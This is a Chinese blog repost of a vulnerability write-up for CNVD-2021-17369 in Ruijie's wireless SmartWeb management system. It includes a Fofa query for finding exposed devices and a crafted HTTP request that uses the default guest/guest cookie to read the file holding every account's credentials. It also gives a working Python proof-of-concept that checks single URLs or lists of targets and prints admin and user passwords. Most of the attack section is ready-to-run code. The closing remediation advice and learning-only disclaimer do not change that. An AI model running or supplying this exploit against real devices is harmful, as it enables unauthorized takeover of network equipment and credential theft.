logo
搜索
我的图书馆

发文章

发文工具

其他工具

留言交流
搜索
分享

(CNVD-2021-17369 )|锐捷无线SmartWeb管理系统存在逻辑缺陷漏洞

 冲天香阵 2021-05-03

0x01 漏洞说明

锐捷无线SmartWeb管理系统存在逻辑缺陷漏洞,攻击者可从低权限用户(guest/guest)获取到管理员账号密码以及存在的用户账号密码。密码为base64编码。

0x02 影响版本

  • 锐捷无线SmartWeb管理系统

0x03 漏洞复现

Fofa搜索标题:(注意:互联网的非授权利用属于违法行为

title='无线smartWeb--登录页面'

漏洞点位于:

/web/xml/webuser-auth.xml

可获取系统所有用户的账号密码,前提需要登录,否则返回401未授权。这里就可以利用默认的guest/guest低权限账号密码进行登录访问,获取到admin权限用户账号密码。

数据包访问方式添加cookie信息:

Cookie: login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302;auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest

数据包:

GET /web/xml/webuser-auth.xml HTTP/1.1Host: IPCookie: login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302;auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guestSec-Ch-Ua: ' Not A;Brand';v='99', 'Chromium';v='90'Sec-Ch-Ua-Mobile: ?0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

图片

base64解密admin的密码:

图片

尝试登录admin:

图片

POC:

#!/usr/bin/env python# -*- conding:utf-8 -*-
import requestsimport urllib3import argparseimport sysurllib3.disable_warnings()

def title(): print(''' 锐捷无线SmartWeb管理系统存在逻辑缺陷漏洞 CNVD-2021-17369 use: python3 SmartWeb.py Author: Henry4E36 ''')
class information(object): def __init__(self, args): self.args = args self.url = args.url self.file = args.file
 def target_url(self): target_url = self.url + '/web/xml/webuser-auth.xml' # 请求头添加默认密码:guest/guest 信息。 headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0', 'Cookie': 'login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302;auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest' } try: res = requests.get(url=target_url, headers=headers, verify=False, timeout=5) if res.status_code == 200 and 'user' in res.text: print(f'\033[31m[{chr(8730)}] 目标系统: {self.url} 存在逻辑缺陷问题!') print(f'[-] 响应为:{res.text}') else: print(f'[\033[31mx\033[0m] 目标系统: {self.url} 不存在逻辑缺陷问题!')
 except Exception as e: print('[\033[31X\033[0m] 站点连接失败')

 def file_url(self): with open(self.file, 'r') as urls: for url in urls: url = url.strip() if url[:4] != 'http': url = 'http://' + url self.url = url.strip() information.target_url(self)
if __name__ == '__main__': title() parser = argparse.ArgumentParser(description='锐捷无线 SmartWeb 管理系统逻辑缺陷漏洞') parser.add_argument('-u', '--url', type=str, metavar='url', help='Target url eg:\'http://127.0.0.1\'') parser.add_argument('-f', '--file', metavar='file', help='Targets in file eg:\'ip.txt\'') args = parser.parse_args() if len(sys.argv) != 3: print( '[-] 参数错误!\neg1:>>>python3 SmartWeb.py -u http://127.0.0.1\neg2:>>>python3 SmartWeb.py -f ip.txt') elif args.url: information(args).target_url() elif args.file: information(args).file_url()

运行效果展示:

图片

0x04 修复建议

升级至最新版本,删除默认用户账号密码,

结束语

本文章仅用于交流学习,请勿使用该漏洞进行违法活动。

https://github.com/Henry4E36/SmartWeb

    本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息,谨防诈骗。如发现有害或侵权内容,请点击一键举报。
    转藏 分享 献花(0

    来自: 冲天香阵 > 《漏洞》

    举报/认领

    0条评论

    发表

    请遵守用户 评论公约

    类似文章 更多